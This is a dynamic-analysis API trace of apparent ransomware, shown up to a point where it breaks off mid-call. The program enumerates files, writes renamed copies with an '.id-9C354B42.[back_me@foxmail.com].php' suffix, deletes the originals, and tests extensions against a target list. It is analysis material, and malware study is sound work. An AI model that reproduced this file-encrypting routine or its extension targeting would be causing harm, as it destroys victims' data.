[0264.965] lstrlenW (lpString="J0178348.JPG") returned 12 [0264.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.965] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=36989) returned 1 [0264.965] CloseHandle (hObject=0x3b4) returned 1 [0264.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg")) returned 0x20 [0264.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0264.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0264.966] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.966] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0264.966] GetLastError () returned 0x0 [0264.966] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x907d, lpOverlapped=0x0) returned 1 [0264.968] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x9080, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x9080, lpOverlapped=0x0) returned 1 [0264.970] ReadFile (in: hFile=0x3b4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0264.970] WriteFile (in: hFile=0x318, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0264.970] SetEndOfFile (hFile=0x318) returned 1 [0264.970] CloseHandle (hObject=0x318) returned 1 [0264.970] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0264.970] SetEndOfFile (hFile=0x3b4) returned 1 [0264.972] CloseHandle (hObject=0x3b4) returned 1 [0264.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0264.973] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0178348.jpg")) returned 1 [0264.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.973] lstrlenW (lpString=".doc") returned 4 [0264.973] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0264.973] lstrlenW (lpString=".docx") returned 5 [0264.973] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0264.973] lstrlenW (lpString=".pdf") returned 4 [0264.973] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0264.973] lstrlenW (lpString=".xls") returned 4 [0264.973] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0264.973] lstrlenW (lpString=".xlsx") returned 5 [0264.973] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0264.973] lstrlenW (lpString=".ppt") returned 4 [0264.973] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0264.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.973] lstrlenW (lpString=".zip") returned 4 [0264.973] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0264.973] lstrlenW (lpString=".rar") returned 4 [0264.973] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0264.973] lstrlenW (lpString=".bz2") returned 4 [0264.973] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0264.973] lstrlenW (lpString=".7z") returned 3 [0264.973] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0264.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.973] lstrlenW (lpString=".dbf") returned 4 [0264.973] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0264.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.973] lstrlenW (lpString=".1cd") returned 4 [0264.974] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.974] lstrlenW (lpString=".jpg") returned 4 [0264.974] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0264.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.974] lstrlenW (lpString=".doc") returned 4 [0264.974] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0264.974] lstrlenW (lpString=".docx") returned 5 [0264.974] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1 [0264.974] lstrlenW (lpString=".pdf") returned 4 [0264.974] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0264.974] lstrlenW (lpString=".xls") returned 4 [0264.974] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0264.974] lstrlenW (lpString=".xlsx") returned 5 [0264.974] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1 [0264.974] lstrlenW (lpString=".ppt") returned 4 [0264.974] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.974] lstrlenW (lpString=".zip") returned 4 [0264.974] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0264.974] lstrlenW (lpString=".rar") returned 4 [0264.974] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0264.974] lstrlenW (lpString=".bz2") returned 4 [0264.974] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0264.974] lstrlenW (lpString=".7z") returned 3 [0264.974] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.974] lstrlenW (lpString=".dbf") returned 4 [0264.974] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0264.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.974] lstrlenW (lpString=".1cd") returned 4 [0264.975] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0264.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 63 [0264.975] lstrlenW (lpString=".jpg") returned 4 [0264.975] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 Thread: id = 60 os_tid = 0x638 [0241.367] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d83df8 [0241.367] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10000) returned 0x3d93e00 [0241.367] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9dfa0 [0241.367] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x6) returned 0xb99ba0 [0241.367] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e150 [0241.367] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x100000) returned 0x43a0020 [0241.368] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e168 [0241.368] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e168, Size=0x20) returned 0xb84880 [0241.368] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0x10) returned 0xb9e168 [0241.368] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0xb9e168, Size=0x20) returned 0xb848a8 [0241.368] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75a00000 [0241.368] GetProcAddress (hModule=0x75a00000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75a2d650 [0241.368] Wow64DisableWow64FsRedirection (in: OldValue=0x37eff58 | out: OldValue=0x37eff58*=0x0) returned 1 [0241.368] lstrlenW (lpString="kernel32.dll") returned 12 [0241.368] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb84880 | out: hHeap=0xb00000) returned 1 [0241.368] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0241.368] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0xb848a8 | out: hHeap=0xb00000) returned 1 [0241.368] Sleep (dwMilliseconds=0x64) [0241.556] lstrcmpiW (lpString1=".LOG2", lpString2=".php") returned -1 [0241.557] lstrlenW (lpString="BCD.LOG2") returned 8 [0241.557] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x24c [0241.591] GetFileSizeEx (in: hFile=0x24c, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=0) returned 1 [0241.591] CloseHandle (hObject=0x24c) returned 1 [0241.591] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.591] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.591] lstrlenW (lpString=".doc") returned 4 [0241.591] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0241.591] lstrlenW (lpString=".docx") returned 5 [0241.591] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0241.591] lstrlenW (lpString=".pdf") returned 4 [0241.591] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0241.591] lstrlenW (lpString=".xls") returned 4 [0241.591] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0241.591] lstrlenW (lpString=".xlsx") returned 5 [0241.592] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0241.592] lstrlenW (lpString=".ppt") returned 4 [0241.592] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.592] lstrlenW (lpString=".zip") returned 4 [0241.592] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString=".rar") returned 4 [0241.592] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString=".bz2") returned 4 [0241.592] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString=".7z") returned 3 [0241.592] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0241.592] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.592] lstrlenW (lpString=".dbf") returned 4 [0241.592] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.592] lstrlenW (lpString=".1cd") returned 4 [0241.592] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.592] lstrlenW (lpString=".jpg") returned 4 [0241.592] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.592] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.592] lstrlenW (lpString=".doc") returned 4 [0241.592] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString=".docx") returned 5 [0241.592] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0241.592] lstrlenW (lpString=".pdf") returned 4 [0241.592] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0241.592] lstrlenW (lpString=".xls") returned 4 [0241.592] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString=".xlsx") returned 5 [0241.593] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0241.593] lstrlenW (lpString=".ppt") returned 4 [0241.593] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.593] lstrlenW (lpString=".zip") returned 4 [0241.593] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString=".rar") returned 4 [0241.593] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString=".bz2") returned 4 [0241.593] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString=".7z") returned 3 [0241.593] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0241.593] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.593] lstrlenW (lpString=".dbf") returned 4 [0241.593] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.593] lstrlenW (lpString=".1cd") returned 4 [0241.593] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0241.593] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0241.593] lstrlenW (lpString=".jpg") returned 4 [0241.593] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0241.593] lstrcmpiW (lpString1=".ttf", lpString2=".php") returned 1 [0241.593] lstrlenW (lpString="kor_boot.ttf") returned 12 [0241.593] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.617] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=2371360) returned 1 [0241.617] CloseHandle (hObject=0x244) returned 1 [0241.617] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0241.617] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.617] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0241.617] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.617] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.617] lstrlenW (lpString=".doc") returned 4 [0241.617] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0241.617] lstrlenW (lpString=".docx") returned 5 [0241.617] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0241.617] lstrlenW (lpString=".pdf") returned 4 [0241.617] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0241.617] lstrlenW (lpString=".xls") returned 4 [0241.617] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0241.617] lstrlenW (lpString=".xlsx") returned 5 [0241.617] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0241.617] lstrlenW (lpString=".ppt") returned 4 [0241.617] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0241.617] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.617] lstrlenW (lpString=".zip") returned 4 [0241.617] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0241.617] lstrlenW (lpString=".rar") returned 4 [0241.617] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0241.617] lstrlenW (lpString=".bz2") returned 4 [0241.617] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0241.617] lstrlenW (lpString=".7z") returned 3 [0241.618] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0241.618] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.618] lstrlenW (lpString=".dbf") returned 4 [0241.618] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.618] lstrlenW (lpString=".1cd") returned 4 [0241.618] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.618] lstrlenW (lpString=".jpg") returned 4 [0241.618] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.618] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.618] lstrlenW (lpString=".doc") returned 4 [0241.618] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString=".docx") returned 5 [0241.618] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0241.618] lstrlenW (lpString=".pdf") returned 4 [0241.618] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString=".xls") returned 4 [0241.618] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0241.618] lstrlenW (lpString=".xlsx") returned 5 [0241.618] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0241.618] lstrlenW (lpString=".ppt") returned 4 [0241.618] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.618] lstrlenW (lpString=".zip") returned 4 [0241.618] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0241.618] lstrlenW (lpString=".rar") returned 4 [0241.618] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0241.618] lstrlenW (lpString=".bz2") returned 4 [0241.619] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0241.619] lstrlenW (lpString=".7z") returned 3 [0241.619] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0241.619] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.619] lstrlenW (lpString=".dbf") returned 4 [0241.619] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0241.619] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.619] lstrlenW (lpString=".1cd") returned 4 [0241.619] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0241.619] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0241.619] lstrlenW (lpString=".jpg") returned 4 [0241.619] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0241.619] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.619] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.619] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.619] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=93248) returned 1 [0241.619] CloseHandle (hObject=0x244) returned 1 [0241.619] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0241.619] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.619] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0241.620] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.620] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.620] lstrlenW (lpString=".doc") returned 4 [0241.620] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.620] lstrlenW (lpString=".docx") returned 5 [0241.620] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.620] lstrlenW (lpString=".pdf") returned 4 [0241.620] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.620] lstrlenW (lpString=".xls") returned 4 [0241.620] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.620] lstrlenW (lpString=".xlsx") returned 5 [0241.620] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.620] lstrlenW (lpString=".ppt") returned 4 [0241.620] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.620] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.620] lstrlenW (lpString=".zip") returned 4 [0241.620] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.620] lstrlenW (lpString=".rar") returned 4 [0241.620] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.620] lstrlenW (lpString=".bz2") returned 4 [0241.620] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.620] lstrlenW (lpString=".7z") returned 3 [0241.620] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.620] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.620] lstrlenW (lpString=".dbf") returned 4 [0241.620] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.620] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.620] lstrlenW (lpString=".1cd") returned 4 [0241.620] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.620] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.620] lstrlenW (lpString=".jpg") returned 4 [0241.620] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.621] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.621] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.621] lstrlenW (lpString=".doc") returned 4 [0241.621] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0241.621] lstrlenW (lpString=".docx") returned 5 [0241.621] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0241.621] lstrlenW (lpString=".pdf") returned 4 [0241.621] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0241.621] lstrlenW (lpString=".xls") returned 4 [0241.621] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0241.621] lstrlenW (lpString=".xlsx") returned 5 [0241.621] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0241.621] lstrlenW (lpString=".ppt") returned 4 [0241.621] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0241.621] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.621] lstrlenW (lpString=".zip") returned 4 [0241.621] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0241.621] lstrlenW (lpString=".rar") returned 4 [0241.621] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0241.621] lstrlenW (lpString=".bz2") returned 4 [0241.621] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0241.621] lstrlenW (lpString=".7z") returned 3 [0241.621] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0241.621] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.621] lstrlenW (lpString=".dbf") returned 4 [0241.621] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0241.621] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.621] lstrlenW (lpString=".1cd") returned 4 [0241.621] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0241.621] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0241.621] lstrlenW (lpString=".jpg") returned 4 [0241.622] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0241.622] lstrcmpiW (lpString1=".mui", lpString2=".php") returned -1 [0241.622] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0241.622] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0241.622] GetFileSizeEx (in: hFile=0x244, lpFileSize=0x37eff1c | out: lpFileSize=0x37eff1c*=90688) returned 1 [0241.622] CloseHandle (hObject=0x244) returned 1 [0241.622] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0241.622] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0241.622] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, 